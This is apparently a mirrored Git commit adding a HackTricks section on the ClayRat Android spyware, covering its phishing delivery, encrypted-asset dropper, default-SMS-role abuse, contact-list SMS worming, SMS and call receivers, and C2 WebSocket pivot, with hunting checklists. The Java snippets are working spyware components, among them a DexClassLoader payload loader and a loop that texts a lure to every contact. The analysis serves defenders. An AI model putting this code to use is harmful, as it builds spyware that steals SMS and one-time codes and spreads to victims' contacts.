mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Add content from: ClayRat: A New Android Spyware Targeting Russia
This commit is contained in:
		
							parent
							
								
									96defaa9b3
								
							
						
					
					
						commit
						e31c5d1278
					
				| @ -429,6 +429,124 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new | ||||
| - Detect installation/launch of an external NFC-relay app triggered by another app. | ||||
| - For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Android SMS role abuse, session-based droppers with encrypted assets, and C2 obfuscation – ClayRat tradecraft | ||||
| 
 | ||||
| ClayRat is a fast-evolving Android spyware family distributed via look‑alike sites and Telegram channels. Below are reusable techniques observed in the campaign that defenders and red-teamers should model and hunt for. | ||||
| 
 | ||||
| ### Delivery funnel: lookalike site → Telegram → APK | ||||
| - Phishing pages impersonate popular apps/services and include step-by-step instructions to enable Unknown Sources on Android. | ||||
| - Users are redirected to Telegram channels seeded with testimonials/metrics before receiving the APK link. This social proof reduces suspicion. | ||||
| 
 | ||||
| ### Session-based installer: encrypted payload in assets + fake Play update UI | ||||
| - The first-stage app presents a fake “Google Play update/verification” screen. | ||||
| - The functional spyware is stored as an encrypted blob under `/assets/` and decrypted only at runtime, then dynamically loaded. | ||||
| - Packed variants hide most logic until decryption, hampering static analysis. | ||||
| 
 | ||||
| Static triage ideas | ||||
| - Unzip and look for large opaque blobs under `assets/` whose entropy is high. | ||||
| - Instrument filesystem to catch a DEX/ZIP written to app-internal storage just before `DexClassLoader`/`PathClassLoader` usage. | ||||
| - APKiD often shows “packer/loader” hints; network traffic may be minimal until decryption completes. | ||||
| 
 | ||||
| <details> | ||||
| <summary>Example: AES‑GCM decrypt from assets and load with DexClassLoader</summary> | ||||
| 
 | ||||
| ```java | ||||
| // 1) Read encrypted payload from assets | ||||
| byte[] enc = readAll(getAssets().open("payload.enc")); | ||||
| byte[] iv  = Arrays.copyOfRange(enc, 0, 12); | ||||
| byte[] ct  = Arrays.copyOfRange(enc, 12, enc.length); | ||||
| 
 | ||||
| // 2) Decrypt (key could be hardcoded/derived from device info) | ||||
| SecretKey key = new SecretKeySpec(deriveKey(), "AES"); | ||||
| Cipher c = Cipher.getInstance("AES/GCM/NoPadding"); | ||||
| c.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv)); | ||||
| byte[] dexBytes = c.doFinal(ct); | ||||
| 
 | ||||
| // 3) Persist DEX and dynamically load | ||||
| File outDex = new File(getCodeCacheDir(), "p.dex"); | ||||
| Files.write(outDex.toPath(), dexBytes); | ||||
| DexClassLoader cl = new DexClassLoader(outDex.getPath(), getCodeCacheDir().getPath(), null, getClassLoader()); | ||||
| Class<?> core = cl.loadClass("com.spy.core.Main"); | ||||
| core.getMethod("start", Context.class).invoke(core.getConstructor().newInstance(), this); | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| ### Privilege consolidation via the default SMS handler role | ||||
| Requesting the device’s default SMS app role consolidates powerful capabilities behind a single consent dialog on modern Android (instead of individual runtime prompts): read/send/intercept SMS, and direct DB access. Malware leverages this to silently mass-message, steal OTPs, and exfiltrate SMS at scale. | ||||
| 
 | ||||
| Minimal request flow (Android 10+): | ||||
| 
 | ||||
| ```java | ||||
| RoleManager rm = (RoleManager) getSystemService(Context.ROLE_SERVICE); | ||||
| if (rm.isRoleAvailable(RoleManager.ROLE_SMS) && !rm.isRoleHeld(RoleManager.ROLE_SMS)) { | ||||
|     Intent i = rm.createRequestRoleIntent(RoleManager.ROLE_SMS); | ||||
|     startActivityForResult(i, 1001); | ||||
| } | ||||
| ``` | ||||
| 
 | ||||
| Hunting/detection | ||||
| - Alert when the default SMS handler changes to an untrusted package. | ||||
| - Monitor immediate spikes in `SEND_SMS` usage and access to `content://sms` following role grant. | ||||
| 
 | ||||
| ### Worm-like propagation via contact list | ||||
| Once SMS and contacts are accessible, the implant mass-sends lures to every contact from the victim’s number. | ||||
| 
 | ||||
| ```java | ||||
| Cursor c = getContentResolver().query( | ||||
|     ContactsContract.CommonDataKinds.Phone.CONTENT_URI, | ||||
|     new String[]{ContactsContract.CommonDataKinds.Phone.NUMBER}, null, null, null); | ||||
| SmsManager sms = SmsManager.getDefault(); | ||||
| while (c.moveToNext()) { | ||||
|   String num = c.getString(0); | ||||
|   sms.sendTextMessage(num, null, "Узнай первым! <link>", null, null); | ||||
| } | ||||
| ``` | ||||
| 
 | ||||
| ### Event‑driven control: BroadcastReceivers for SMS and calls | ||||
| Receivers enable reactive execution without a foreground service. | ||||
| 
 | ||||
| Manifest sketch: | ||||
| 
 | ||||
| ```xml | ||||
| <receiver android:name=".SmsRx" android:exported="true"> | ||||
|   <intent-filter> | ||||
|     <action android:name="android.provider.Telephony.SMS_RECEIVED"/> | ||||
|   </intent-filter> | ||||
| </receiver> | ||||
| <receiver android:name=".OutCall" android:exported="true"> | ||||
|   <intent-filter> | ||||
|     <action android:name="android.intent.action.NEW_OUTGOING_CALL"/> | ||||
|   </intent-filter> | ||||
| </receiver> | ||||
| ``` | ||||
| 
 | ||||
| Observed actions include immediate front‑camera capture and upload on first run, full SMS dump, call log exfiltration, and commandable call placement. | ||||
| 
 | ||||
| ### C2 traffic protection, markers, and proxy/WebSocket pivot | ||||
| - Early variants obfuscate with Base64 and inject the marker string `apezdolskynet` in payloads (plaintext visible after decode). Hunt for this artifact in HTTP bodies. | ||||
| - Later builds encrypt telemetry and tasking with **AES‑GCM** and keep logic packed until runtime. | ||||
| - Resilient comms: a command like `get_proxy_data` returns an HTTP/HTTPS endpoint which is converted to a (secure) WebSocket and augmented with a device ID; tasks are scheduled periodically/delayed to keep the channel alive. | ||||
| 
 | ||||
| ```java | ||||
| String cfg = httpGet(c2+"/get_proxy_data"); // returns e.g., https://c2.tld/path | ||||
| Uri u = Uri.parse(cfg); | ||||
| String ws = ("https".equals(u.getScheme()) ? "wss" : "ws") + "://" + u.getHost() + | ||||
|             (u.getPort()!=-1?":"+u.getPort():"") + u.getPath() + "?id=" + deviceId; | ||||
| // connect(ws); schedule heartbeat/retry tasks | ||||
| ``` | ||||
| 
 | ||||
| ### DFIR/Hunting checklist (ClayRat-style) | ||||
| - Network: flag HTTP POST bodies that Base64‑decode to include `apezdolskynet`. | ||||
| - Role events: monitor/alert on default SMS handler changes; look for mass‑SMS bursts. | ||||
| - APK triage: encrypted blobs in `/assets/` with runtime `DexClassLoader` usage; fake Play update UI. | ||||
| - Components: receivers for `SMS_RECEIVED` and `NEW_OUTGOING_CALL` in untrusted apps. | ||||
| - Behaviour: front camera used immediately after first grant; exfil of SMS, call logs, notifications. | ||||
| - Hygiene: ensure Play Protect is enabled; deploy mobile EDR/MTD and block sideloading where possible. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign) | ||||
| @ -440,5 +558,10 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new | ||||
| - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) | ||||
| - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) | ||||
| - [Socket.IO](https://socket.io) | ||||
| - [ClayRat: A New Android Spyware Targeting Russia](https://zimperium.com/blog/clayrat-a-new-android-spyware-targeting-russia) | ||||
| - [ClayRat IOCs – Zimperium GitHub](https://github.com/Zimperium/IOC/tree/master/2025-10-ClayRat) | ||||
| - [Android dangerous permissions overview](https://developer.android.com/guide/topics/permissions/overview#dangerous_permissions) | ||||
| - [RoleManager (default SMS app role)](https://developer.android.com/reference/android/app/role/RoleManager) | ||||
| - [Google Play Protect overview](https://support.google.com/googleplay/answer/2812853?hl=en) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user